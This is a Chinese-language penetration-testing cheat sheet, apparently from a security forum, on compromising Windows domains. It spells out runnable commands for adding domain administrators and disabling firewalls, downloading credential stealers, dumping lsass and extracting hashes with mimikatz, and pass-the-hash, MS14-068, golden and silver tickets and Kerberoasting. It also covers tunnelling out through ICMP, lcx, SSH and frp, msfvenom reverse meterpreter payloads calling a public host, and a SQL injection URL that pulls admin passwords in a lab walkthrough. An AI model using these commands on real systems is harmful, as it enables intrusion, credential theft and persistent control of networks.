当一台机子返回会话后,我们可以使用相关命令进行相应的信息收集
Systeminfo 计算机详细信息(补丁信息) Net start 所启动的服务 Wmic service list brief 查询本机服务信息 Tasklist 进程列表 Wmic startup get command,caption 查看启动该程序信息 Schtasks /query /fo LIST /v计划任务 Netstat -ano 根据本机端口开放情况来判断有什么服务、其角色 Query user || qwinsta 查看当前在线用户 Net session 列出会话 Net share 查看本机的共享列表 Wmic share get name,path,status 查看共享列表 Net user 本地用户 Net user kkkk 查看本地用户信息 Net user kent password /add添加本地用户 Net localgroup 本地用户组 Net localgroup /domain 域用户组 Net localgroup Administrators kent /add 将本地用户添加到本地管理员组 Net localgroup adminnstrators 本地管理员组成员 net localgroup adminstrators /domain 域管理员组成员 Wmic useraccount get /all 获取域内用户详细信息 dsquery user 查看存在的用户 Net user /domain 域用户信息 Net user kkkk /domain 域用户kkkk信息 Net user kent password /add /domain添加域用户 Net localgroup Administrators kent /add /domain 将域用户添加到域管理员组 Net localgroup Administrators /add test\kent 将域用户添加到本地管理员组 Net group /domain 域用户组信息 Net view /domain 查询域 Net view /domain:test 查询域内计算机 Net accounts /domain 查询域中密码策略 Net group /domain 查看域内所有用户组 Net group “Domain Controllers” /domain 查看域控制器组 Net group “Domain computers” /domain 查看域内所有计算机列表 Net group “Domain admins” /domain 查看域内管理员用户 Net user /domain kent active:yes 启用域账户 Net user /domain kent active:no 禁用域账户 Nltest /DCLIST:test 查看域中域控制器名 Wmic useraccount get /all 用户详细信息 Net group “Domain Admins” /domain 对应组下的账户信息 nltest /domain_trusts 获取域信任信息 net config workstation 了解本机的配置信息 Netsh firewall show config 查看防火墙配置 Netsh advfirewall set allprofiles state off关闭防火墙(windows server 2003后) Netsh advfirewall firewall add rule name=”pass nc” dir=in action=allow program=”C:\nc.exe” 允许指定程序进入(windows server 2003后) Netsh advfirewall firewall add rule name=”allow nc” dir=out action=allow program=”C:\nc.exe”允许指定程序退出(windows server 2003后) Netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow 允许3389连接(windows server 2003后) Netsh advfirewall set currentprofile logging filename=”C:\winodws\temp\fw.log” 自定义防火墙日志存储位置 Reg query “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings”查看端口代理配置信息 Reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber查看远程桌面端口号 以下命令是开启3389端口 (windows server 2003后) wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f net start TermService
SharpDecryptPwd: https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe TeamViewer :SharpDecryptPwd.exe -TeamViewer Navicat: SharpDecryptPwd.exe -NavicatCrypto Xshell:SharpDecryptPwd.exe -Xmangager -p SessionPath -s username+sid(whoami /user) laZagne : https://github.com/ethicalhackeragnidhra/LaZagne/archive/2.3.1.zip 使用方法:laZagne.exe all
我们用上述命令简单收集计算机基本信息: Ipconfig /all 根据DNS后缀判断是否有域 Net view /domain 判断是否存在域 确定域控的ip地址: net time /domain 然后通过nslookup或ping确定其域控ip: 确定当域内存活主机: for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr “TTL=”
使用明文密码登录到域控,需要135端口开启: Net use \192.168.202.148\ipc$ password /user:test\administrator 把后门复制到域控c盘,at新建定时作业:
Windows server 2012及以上使用schtasks命令 Schtasks /create /s 192.168.202.148 /ru “SYSTEM” /tn executefile /sc DAILY /tr c:/h4.exe /F Schtasks /run /s 192.168.202.148 /tn executefile /i Schtasks /delete /s 192.168.202.148 /tn executefile /f
Atexec.exe test/administrator:zxcvbnm123@192.168.202.148 “whoami” Atexec.exe -hashes :fac5d668099409cb6fa223a32ea493b6 test/administrator@192.168.202.148 “whoami”
已知密码和用户批量连接ip: FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “password” /user:test\administrator 已知用户和ip批量连接密码: FOR /F %%i in (pass.txt) do net use \192.168.202.148\ipc$ “%%i” /user:test\administrator 已知用户和ip批量连接hash: FOR /F %%i in (hash.txt) do atexec.exe -hashes :“%%i” test/administrator@192.168.202.148 “whoami”
在windows server 2012以上的版本默认关闭wdiget,攻击者无法在内存中获取明文密码。 在windows server 2012以下的版本如果安装了KB2871997补丁,也无法获取明文密码。
Procdump.exe -accepteula -ma lsass.exe lsass.dmp(需要管理员权限) 利用Mimikatzm相关命令获取dmp中的hash: Privilege::debug Sekurlsa::minidump lsass.dmp Sekurlsa::logonPasswords full 可以通过hashcat爆破hash值,获得对应的明文密码: Hashcat -a 0 -m 1000 hashfile passfile
官方Psexec第一种利用方法:可以先有ipc链接,再用psexec运行相应的程序: Net use \192.168.202.148\ipc$ zxcvbnm123 /user:test\Administrator Psexec \192.168.202.148 -accepteula -s cmd 官方Psexec第二种利用方法:不用建立ipc连接,直接使用密码或hash进行传递 Psexec \192.168.202.148 -u Administrator -p zxcvbnm123 -s cmd PsExec -hashes :fac5d668099409cb6fa223a32ea493b6 test.com/Administrator@192.168.202.148 "whoami" (官方执行不了)
使用第三方Impacket工具包中的smbexec和psexec(使用方法同官方一致) 使用Impacket第三方PsExec,命令与官方的一致: 使用Impacket第三方Smbexec: Smbexec test/Administrator:zxcvbnm123@192.168.202.148 Smbexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148
WMI利用135端口,支持明文和hash两种方式进行身份验证,且系统日志不记录。 第一种:使用系统自带的WMIC明文传递执行相应命令,但执行的结果不回显(先管理员账户登录) Wmic /node:192.168.202.148 /user:Administrator /password:zxcvbnm123 process call create “cmd.exe /c ipconfig >C:/1.txt”
第二种:使用系统自带cscript明文传递执行反弹shell,执行结果有回显,现已被杀 Cscript //nologo wmiexec.vbs /shell 192.168.202.148 Administrator zxcvbnm123
第三种:使用第三方impacket套件中的Wmiexec进行明文或hash传递,执行结果有回显 Wmiexec test/Administrator:zxcvbnm123@192.168.202.148 “whoami” Wmiexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148 “whoami”
PTH是攻击者通过LM Hash和NTLM Hash访问远程主机或服务,不需提供明文密码。当禁用了NTLM Hash验证时,不能使用PsExec进行Hash传递,mimikatz还是可以。 Privilege::debug Sekurlsa::pth /user:Administrator /domain:test /ntlm:fac5d668099409cb6fa223a32ea493b6 关于KB22871997是否能防护PTH攻击? Pth:没有打补丁时,任何用户都可以连接,打了补丁只能administrator连接 Ptk:打了补丁后,用户才能可以连接,采用aes256连接
1、使用明文密码连接RDP Windows: Mstsc.exe /console /v:192.168.202.148 /admin Linux: rdesktop 192.168.202.148:3389 2、使用hash连接RDP 使用hash 连接需要Restricted Admin mode开启,Windows server 2012默认开启了,windows server 2008需要安装2871997、2973351补丁后,执行下面命令: REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 当开启后就能使用mimikatz进行hash连接RDP: Privilege::debug Sekurlsa::pth /user:Administrator /domain:test /ntlm:fac5d668099409cb6fa223a32ea493b6 “/run:mstsc.exe /restrictedadmin”
利用ekeys aes256 Sekurlsa::ekeys 获取aes Sekurlsa::pth /user:Administrator /domain:test2 /aes256:6e09831ee88fb85c8a3f4a88dea70e2a1b18197b70d57a9eebad73b45137433d
PTT(pass the ticket)不再使用NTLM进行认证,而是利用kerberos协议进行攻击,相对于PTH来说其不需要管理员权限,有三种常见的攻击方式:MS14-068(漏洞编号kb3011780)、Golder ticket、Silver ticket,其中后两者是将连接合法的票据注入内存中属于权限维持(后面写)。
第一种使用MS14-068 exp: 先用whoami /user查看当前用户sid Kerberos::purge或klist purge先清空当前机器中的所有凭证: 利用MS14-068生成相应凭证: MS14-068.exe -u c@test.com -s S-1-5-21-2273191065-1635484360-3888421177-1105 -d 192.168.202.148 -p c@zxcvbnm123 使用mimikatz将票据注入内存: Kerberos::ptc “TGT_c@test.com.ccache” 后续利用: 第二种kekeo利用hash生成票据: Kekeo “tgt::ask /user:c /domain:test.com /ntlm:abe09320f41c250eadcc5bfba77a5e1a” 同样清楚票据并导入生成的票据: kerberos::ptt TGT_c@TEST.COM_krbtgt~test.com@TEST.COM.kirbi 第三种利用mimikatz收集本地的票据并重新导入(导出需要管理员权限): Sekurlsa::tickets /export 使用Kerberos::ptt 进行导入票据。
Golder ticket使用krbtgt账户的密码hash值,利用伪造高权限的TGT向KDC要求颁发拥有任意服务访问权限的票据,从而获得域控权限。在域环境中,每个账户的票据都是Krbtgt生成的,当攻击者得到krbtgt hash或AES256值后,我们就可以伪造任一域用户的身份,并用该身份进行访问。伪造Golder ticket利用条件: 1、krbtgt用户hash或AES256值 2、域名称 3、域的SID值 4、要伪造的管理员名
下面是具体操作: Privilege::debug 执行导出krbtgt hash命令 Lsadump::dcsync /domain:test.com /user:krbtgt 获得hash值:71204258ec5b715c29f6c8ee40a0c20d 获取域SID Wmic useraccount get name,sid S-1-5-21-2273191065-1635484360-3888421177-500 查询域管理员账户 net group “domain admins” /domain 获得域名 ipconfig /all Kerberos::purge清空票据,然后使用下面命令生成krbtgt的票据 kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-2273191065-1635484360-3888421177-500 /krbtgt:71204258ec5b715c29f6c8ee40a0c20d /ticket:krbtgt. kiribi kerberos::ptt krbtgt.kiribi 把生成的票据重新导入内存
Silver Ticket会通过相应的服务账户来伪造TGS,例如LDAP、MSSQL、WinRM、CIFS等,范围相对有限,只能获取对应服务权限,且Silver Ticket是由特定的账户加密的。利用条件: 1、域名 2、域SID 3、目标服务器的FQDN 4、可利用的服务 5、服务账号的NTLM Hash 6、需要伪造的用户名 下面进行相应的操作: 先清空系统中的票据 : Kerberos::purge 使用mimikatz生成伪造的 Silver Ticket : kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-2273191065-1635484360-3888421177-500 /target:WIN-MPPGQR2OWEC.test.com /service:cifs /rc4:fac5d668099409cb6fa223a32ea493b6 /user:c3 /ptt 退出mimikatz,查看内存中的票据: 重新访问域控的共享目录:
在域环境中,SPN扫描是查找相关服务较好的方法,可以从相关服务着手,如MSSQL、WSMAN、Exchange、TERMSERV、Hyper-V。其扫描是通过请求特定SPN类型的服务主题名称进行的。与普通网络端口相比,SPN扫描不需要连接IP来检测服务端口,所以能规避一些IPS的规则,且进行扫描只需普通域用户权限。 注册SPN Setspn -A c3/test MSSQL 查看注册的SPN Setspn -q / Setspn -q / | findstr “MYSQL” 请求服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MySQL/win7.xie.com:3306/MySQL" 列出服务票据 Klist 并用mimikatz将票据导出 Kerberos::list /export 最后使用tgsrepcrack.py爆破得到相应密码。
先在受控端(web服务器)运行PingTunnel工具,执行开启隧道命令 sudo ./pingtunnel -type server 在控制端(公网vps)执行下面命令,打开需要监听的本地端口,会把指定的服务器相应端口的数据封装在ICMP隧道中,以受控端(web服务器)为IMCP隧道跳板进行传输。 pingtunnel -type client -l :本地所监听的端口 -s 受控端IP -t 指定要转发的目标IP:指定要转发的目标端口 -tcp 1 pingtunnel -type client -l :33444 -s 192.168.74.132 -t 192.168.96.145:80 -tcp 1 访问本地监听端口:
Lcx是传输层经典的转发工具。Lcx是一个基于Socket套接字实现的转发工具,其linux版本为portmap。一个正常的Socket隧道必须具备两端:一端为服务端,负责监听一个端口并等待客户端连接;另一端为客户端,通过服务端的地址和端口与其连接,并转发相应的数据给服务端。 在自己的公网vps(即服务端)执行监听命令,将本机4444端口上监听的所有数据转发给本机的5555端口,以便其它机器访问。 Lcx.exe -listen 4444 5555 在受控端(即客户端)执行数据转发命令,将目标机器的80端口转发到公网vps的4444端口。 Lcx.exe -slave 公网ip 4444 目标机器IP 80 我们通过vps的ip和5555访问到目标机器的80端口:
同样地lcx也常用于本地端口映射,当目标服务器由于防火墙限制,部分端口没能通过防火墙时,可以将目标服务器响应端口数据转发到防火墙允许的端口。在目标服务器执行下面命令,即可把远程桌面转到53端口: Lcx -tran 53 目标服务器IP 3389
-C:压缩传输,提高速度。 -f: 后台执行 -N:建立静默连接 -g:允许远程主机连接本地用于转发的端口 -L:本地端口转发 -R:远程端口转发 -D:动态端口转发 -P:指定SSH端口
本地转发: 在VPS执行如下相应命令,该命令以web服务器为跳板,将内网服务器的端口映射到公网的vps上,我们访问对应公网vps的端口即可。 Ssh -CfNg -L 公网VPS端口:目标主机IP:目标端口号 root@跳板机IP
远程转发: 当公网的vps不能访问访问到内网的服务器(包括web服务器),但web服务器能访问到公网的vps时,我们在web服务器执行如下相应命令,该命令以web服务器为跳板,将vps端口的流量转发到内网服务器相应端口上,我们访问对应公网vps的端口即可。 Ssh -CfNg -R vps端口:目标主机IP:目标端口号 root@跳板机IP
动态转发: 动态端口映射时建立一个ssh加密的socks4/5代理通道,任何支持socks4/5协议的程序都可以通过此通道进行代理访问。我们在vps上执行如下命令: ssh -CfNg -D 7000 root@代理主机IP
执行命令./sunny clientid d8d99b5ff5d4996 访问对应的域名,确认能连接成功: 执行命令生成相应的exe: msfvenom -p windows/meterpreter/reverse_http lhost=mai1zhi2.free.idcfengye.com lport=80 -f exe -o h7.exe 设置好相应的payload后,打开监听,运行exe:
服务端默认监听端口是7000,执行命令,启动服务端 ./frps -c ./frps.ini 启动客户端frpc配置文件: [msf] type = tcp local_ip = 本地ip地址 local_port = 22222 转发给本机的22222端口,也就是msf的监听端口 remote_port = 6000 服务端打开6000端口进行监听 执行命令连接服务端:./frpc -c ./frpc.ini 服务端显示有客户端连接: 服务端开启6000端口进行监听 Msf生成exe文件: msfvenom -p windows/meterpreter/reverse_http lhost=公网ip lport=公网ip监听的端口 -f exe -o h4.exe 执行exe上线:
这个靶场是月师傅所搭,我们用这个靶场作为实践,靶场拓扑图: 先进行主机发现,方法有许多,分别是基于层面和工具上的不同: 1、使用netdiscover sudo netdiscover -i eth0 -r 192.168.202.0/24 专用的二层发现工具。拥有主动和被动发现两种方式。 常用参数: -i:网卡 选择你监控的网卡。比如eth0 -r:range 指定IP段。比如192.168.0.0/24 -l:filename 从文件读取range列表 -p 被动模式。默默的侦听指定的网卡以发现别的二层主机 -t ARP包发送间隔。单位毫秒。这个可以用来规避检测系统的告警。 -c 发包数量 2、使用nmap nmap -v -sP 192.168.202.0/24 以上参数: -sP、ICMP扫描: 类似于ping检测,快速判断目标主机是否存活,不做其他扫描 3、使用系统自带ping(速度稍慢) for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr “TTL=” fping -g 10.10.10.0/24
然后对所发现的主机进行端口扫描,同样也有不同工具来进行端口扫描: 1、nmap nmap -sS -p 1-65535 -v 192.168.202.183 以上参数: -P 指定端口扫描 -V 详细信息 -sS、TCP SYN扫描(半开扫描): 只向目标发出SYN数据包,如果收到SYN/ACK响应包就认为目标端口正在监听,并立即断开连接;否则认为目标端口并未开放。 -sT、TCP 连接扫描: 这是完整的TCP扫描方式,用来建立一个TCP连接,如果成功则认为目标端口正在监听服务,否则认为目标端口并未开放。 -sF、TCP FIN扫描: 开放的端口会忽略这种数据包,关闭的端口会回应RST数据包。许多防火墙只对SYN数据包进行简单过滤,而忽略了其他形式的TCP攻击包。这种类型的扫描可间接检测防火墙的健壮性。 -sU、UDP扫描: 探测目标主机提供哪些UDP服务,UDP扫描的速度会比较慢。 识别对应的端口 nmap -sV -A 192.168.202.183 -p 80,53,6588,5985,3389,135,21,999 -oA myAttackPorts -sV: 探测相应服务版本号 -A: 综合扫描,包含1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测 -oA:同时在三个主要的格式文档输出扫描结果 使用xsltproc美化结果输出文档: xsltproc -o attck.html mode.xsl myAttackPorts.xml
2、masscan sudo masscan -p 1-65535 192.168.202.183 --rate=1000 常用参数: -p <ports,--ports <ports>> 指定端口进行扫描 --banners 获取banner信息,支持少量的协议 --rate <packets-per-second> 指定发包的速率,默认的速率是100包/秒
绑定域名,再对其www.moonlab.com进行目录爆破, 如果用kali自带的dirbuster工具会因为UA和速度等问题被拦截: 所以我们可以自己编写脚本进行目录的爆破,每间隔0.5秒进行请求操作:
访问网址可知,这是siteserver3.6.1,从网上找到该版本报错注入的相关poc,获得数据库版本信息: http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20-- 获得数据库名: http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20db_name()=~2;%20-- 根据查询数据库语句相继获取到后台的用户名、密码及salt值: http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=(SELECT%20TOP%201%20[Password]%20FROM%20[bairong_Administrator]);%20--
然后我们根据网上所下载的原理分析出其登录时的密码加密流程: 先看FrameworkLogin类的Submit_Onclick()方法,流程很简单先判断验证码,然后把用户名和密码传入AdminManager.Authticate: 继续跟入AdminManager.Authticate,调用了AdministratorDAO.ValidateUser()验证: 继续跟入AdministratorDAO.ValidateUser()的实现,函数先根据用户名找到用户的信息,根据数据库中用户的密码与输入的密码调用checkpassword()函数进行比对: 把数据库中的密码和salt传入DecodePassword()进行相应的解密: DecodePassword()函数中调用的是系统库的des解密: 我们了解了相关的解密流程,就可以自己编写相关的解密工具去解密前面注入得到的密码为admin5566。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!